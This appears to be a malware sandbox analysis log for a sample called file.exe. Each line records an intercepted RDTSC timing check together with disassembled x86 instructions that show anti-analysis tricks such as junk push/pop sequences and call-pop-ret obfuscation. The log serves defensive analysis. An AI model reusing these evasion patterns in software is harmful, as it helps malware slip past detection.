    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA385 second address: 2BA396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA396 second address: 2BA3A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65504F5A46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA3A0 second address: 2BA3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007F655118F746h 0x00000013 jmp 00007F655118F753h 0x00000018 popad 0x00000019 jmp 00007F655118F759h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2BA3E0 second address: 2BA3EA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65504F5A4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F186F second address: 2F187A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F655118F746h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F187A second address: 2F18A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F65504F5A5Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1A3E second address: 2F1A4C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1BB3 second address: 2F1BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A4Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F1BC2 second address: 2F1BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2285 second address: 2F228B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F228B second address: 2F228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2414 second address: 2F2418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2418 second address: 2F2422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2422 second address: 2F2426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2426 second address: 2F246D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F752h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F655118F757h 0x00000016 popad 0x00000017 jmp 00007F655118F751h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F246D second address: 2F2472 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F25DB second address: 2F25E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F25E9 second address: 2F25F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65504F5A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2BC2 second address: 2F2BD2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F655118F746h 0x00000008 jns 00007F655118F746h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2BD2 second address: 2F2BE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F65504F5A4Ch 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F2BE8 second address: 2F2BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F3060 second address: 2F306B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F65504F5A46h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F6922 second address: 2F692C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FA23D second address: 2FA247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F65504F5A46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FEAEE second address: 2FEAF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FDEDF second address: 2FDEEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FDEEB second address: 2FDEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0A8 second address: 2FE0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65504F5A50h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0BC second address: 2FE0D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0D3 second address: 2FE0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65504F5A54h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2FE0EB second address: 2FE11D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F655118F74Dh 0x00000011 pushad 0x00000012 jmp 00007F655118F755h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30096F second address: 300975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300975 second address: 300979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300979 second address: 3009A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 44BAC270h 0x0000000f mov dword ptr [ebp+122D2090h], ebx 0x00000015 add esi, 0B7C6623h 0x0000001b call 00007F65504F5A49h 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jo 00007F65504F5A46h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3009A6 second address: 300A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F757h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c jne 00007F655118F756h 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F655118F74Bh 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F655118F759h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 300A08 second address: 300A2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65504F5A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F65504F5A4Ch 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ebx 0x00000016 pushad 0x00000017 js 00007F65504F5A46h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3015CA second address: 30161B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F655118F748h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 cmc 0x00000024 or dword ptr [ebp+122D29E7h], ecx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F655118F74Fh 0x00000033 jmp 00007F655118F74Dh 0x00000038 popad 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30161B second address: 301620 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3020B9 second address: 3020BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3020BF second address: 302116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F65504F5A58h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F65504F5A57h 0x00000014 pop edx 0x00000015 nop 0x00000016 mov dword ptr [ebp+122D2324h], edx 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 jc 00007F65504F5A4Ch 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push ecx 0x0000002b pop ecx 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 302B40 second address: 302B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D2BBDh] 0x0000000f push 00000000h 0x00000011 jmp 00007F655118F74Eh 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 push eax 0x0000001a mov dword ptr [ebp+122D1BB4h], esi 0x00000020 pop ecx 0x00000021 jg 00007F655118F74Ch 0x00000027 xor edi, dword ptr [ebp+122D36DAh] 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F655118F74Dh 0x00000036 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 302B87 second address: 302B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65504F5A52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 303DBE second address: 303DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3048A1 second address: 3048A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3048A5 second address: 3048A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3048A9 second address: 3048AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305CDC second address: 305CE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305CE0 second address: 305D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, 7993h 0x0000000e push 00000000h 0x00000010 call 00007F65504F5A57h 0x00000015 mov edi, dword ptr [ebp+122D2A12h] 0x0000001b pop esi 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F65504F5A48h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 stc 0x00000039 or di, 9200h 0x0000003e xchg eax, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 je 00007F65504F5A52h 0x00000047 jmp 00007F65504F5A4Ch 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305D4B second address: 305D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F655118F74Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F655118F759h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 305D80 second address: 305D9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30666B second address: 30666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30666F second address: 306675 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30AF88 second address: 30AF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 306F6C second address: 306F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 307A30 second address: 307A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A018 second address: 30A08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+12474393h], edi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push esi 0x00000016 xor dword ptr [ebp+122D1856h], edx 0x0000001c pop edi 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F65504F5A48h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e jnp 00007F65504F5A4Ch 0x00000044 mov dword ptr [ebp+122D193Ah], ecx 0x0000004a mov eax, dword ptr [ebp+122D0661h] 0x00000050 or di, 39A8h 0x00000055 push FFFFFFFFh 0x00000057 push edx 0x00000058 jp 00007F65504F5A48h 0x0000005e mov bl, ch 0x00000060 pop edi 0x00000061 nop 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B1AC second address: 30B1B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30A08F second address: 30A093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30C28F second address: 30C293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B2A0 second address: 30B2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F10F second address: 30F11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F655118F746h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F11C second address: 30F14C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65504F5A51h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65504F5A51h 0x0000000e jmp 00007F65504F5A4Ah 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30C293 second address: 30C31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push edi 0x00000009 mov di, si 0x0000000c pop ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F655118F748h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e or di, D371h 0x00000033 mov ebx, 4BFBAC00h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov eax, dword ptr [ebp+122D03D9h] 0x00000045 mov ebx, dword ptr [ebp+122D377Ah] 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push ebx 0x00000050 call 00007F655118F748h 0x00000055 pop ebx 0x00000056 mov dword ptr [esp+04h], ebx 0x0000005a add dword ptr [esp+04h], 00000015h 0x00000062 inc ebx 0x00000063 push ebx 0x00000064 ret 0x00000065 pop ebx 0x00000066 ret 0x00000067 jne 00007F655118F74Ch 0x0000006d mov edi, dword ptr [ebp+122D35D6h] 0x00000073 push eax 0x00000074 push edi 0x00000075 push ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30B2A4 second address: 30B2AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F14C second address: 30F152 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F152 second address: 30F16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jnp 00007F65504F5A4Ch 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2C5F10 second address: 2C5F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F7D7 second address: 30F7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp], eax 0x00000008 and ebx, dword ptr [ebp+12463D37h] 0x0000000e push 00000000h 0x00000010 xor ebx, dword ptr [ebp+122D32F4h] 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1245A792h], edx 0x0000001e xchg eax, esi 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F7FB second address: 30F7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 30F7FF second address: 30F803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 311943 second address: 3119A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F655118F75Bh 0x00000008 jmp 00007F655118F755h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 or dword ptr [ebp+122D2D08h], eax 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F655118F748h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 pushad 0x00000035 mov si, CCAFh 0x00000039 popad 0x0000003a push eax 0x0000003b js 00007F655118F754h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3119A2 second address: 3119A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3109FD second address: 310A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 310A01 second address: 310A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314B24 second address: 314B2E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F655118F746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314B2E second address: 314BA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F65504F5A48h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jmp 00007F65504F5A55h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F65504F5A48h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 push 00000000h 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jl 00007F65504F5A48h 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314BA2 second address: 314BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F655118F748h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 314BC6 second address: 314BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C51 second address: 312C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 312C5A second address: 312C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315D2B second address: 315D3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F655118F74Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 315D3B second address: 315D40 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316D40 second address: 316D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 316D44 second address: 316D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
